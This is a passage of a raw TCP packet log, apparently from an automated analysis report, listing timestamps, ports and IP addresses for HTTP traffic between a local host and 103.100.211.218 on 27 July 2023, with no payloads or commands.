Jul 27, 2023 20:19:07.567737103 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.567773104 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.568672895 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832482100 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832513094 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832532883 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832551956 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832573891 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832595110 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832616091 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832636118 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832655907 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832678080 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832698107 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832716942 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832717896 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832717896 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832717896 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832717896 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832739115 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832762957 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832784891 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832807064 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832823038 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832823038 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832828045 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832823038 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832823992 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832849979 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832870960 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832882881 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832882881 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832882881 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832882881 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832894087 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832916975 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832926989 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832926989 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832938910 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832958937 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832962036 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.832983971 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.832986116 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.833017111 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.833017111 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.833323956 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.835040092 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.835062981 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.835082054 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.835110903 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.835155964 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.835163116 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.835182905 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.835202932 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:07.835237026 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.835294962 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:07.835294962 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.097450018 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.097482920 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.097506046 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.097526073 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.097548962 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.097604990 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.097609043 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.097681999 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.097686052 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.097703934 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.097724915 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.097743988 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.097743988 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.097743988 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.097765923 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.097785950 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.097785950 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.097807884 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.097819090 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.097979069 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.362348080 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.362426996 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.362478018 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.362534046 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.362586021 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.362591028 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.362634897 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.362658978 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.362658978 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.362687111 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.362765074 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.362773895 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.362819910 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.362871885 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.362896919 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.362921953 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.362948895 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.362978935 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.362996101 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.363038063 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.363070965 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363142967 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363171101 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.363214016 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363215923 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.363281965 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363286972 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.363333941 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363384008 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363394022 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.363432884 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363440037 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.363482952 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363532066 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363574982 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.363593102 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363595963 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.363655090 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363656998 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.363707066 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363758087 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363768101 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.363816023 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.363818884 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363868952 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363909960 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.363919973 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.363935947 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.363998890 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364006996 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.364048958 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364048958 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.364099979 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364147902 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364188910 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.364197969 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364216089 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.364248991 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364341974 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.364342928 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364399910 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364423037 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.364449978 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.364450932 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364500999 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364532948 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.364548922 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364561081 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.364597082 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.364599943 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364648104 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364697933 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364743948 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.364748955 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364773035 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.364803076 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364852905 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364854097 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.364902973 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.364953041 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365000963 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365036964 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.365048885 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365098000 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365137100 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.365148067 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365197897 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365222931 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.365248919 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.365250111 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365299940 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365348101 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365386009 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.365396976 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365412951 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.365447044 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365495920 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365504026 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.365530968 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.365545988 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365593910 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365626097 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.365643024 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365648031 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.365696907 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365736961 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.365751028 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.365771055 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365827084 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365859985 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.365869999 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.365879059 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365928888 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365972996 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.365977049 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.365989923 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366028070 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366077900 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366082907 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366121054 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366144896 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366167068 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366173029 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366189957 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366198063 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366216898 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366224051 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366240978 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366262913 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366286039 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366307974 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366332054 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366338015 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366355896 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366357088 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366384029 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366384983 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366395950 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366410971 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366435051 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366436005 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366457939 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366481066 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366482019 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366503000 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366508007 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366527081 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366533995 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366552114 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366553068 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366565943 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366576910 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366600037 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366600990 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366622925 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366624117 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366648912 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366660118 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366672039 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366672993 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366692066 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366697073 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366717100 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366719007 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366730928 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366744041 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366755009 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366766930 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366791964 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366805077 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366813898 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366830111 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366837978 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366852999 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366863012 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366874933 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366885900 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366908073 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366909027 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366931915 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366934061 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366941929 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.366957903 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.366981030 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367008924 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367017984 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367042065 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367043972 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367085934 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367108107 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367130995 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367149115 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367155075 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367163897 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367181063 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367187023 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367206097 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367218018 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367229939 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367254972 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367266893 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367279053 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367291927 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367307901 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367320061 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367331982 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367355108 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367376089 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367398977 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367400885 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367419958 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367420912 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367444038 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367444992 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367460012 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367468119 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367490053 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367491961 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367517948 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367528915 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367542028 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367552996 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367572069 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367577076 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367604971 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367634058 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367655039 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367664099 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367671967 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367693901 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367698908 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367723942 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367755890 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367778063 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367788076 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.367810011 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.367846012 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.633852959 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.633887053 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.633908987 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.633930922 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.633946896 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.633954048 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.633975983 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.633981943 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.633991003 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634004116 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634016037 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634037971 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634057999 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634057999 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634079933 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634087086 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634103060 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634107113 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634124041 CEST	80	49698	103.100.211.218	192.168.2.4
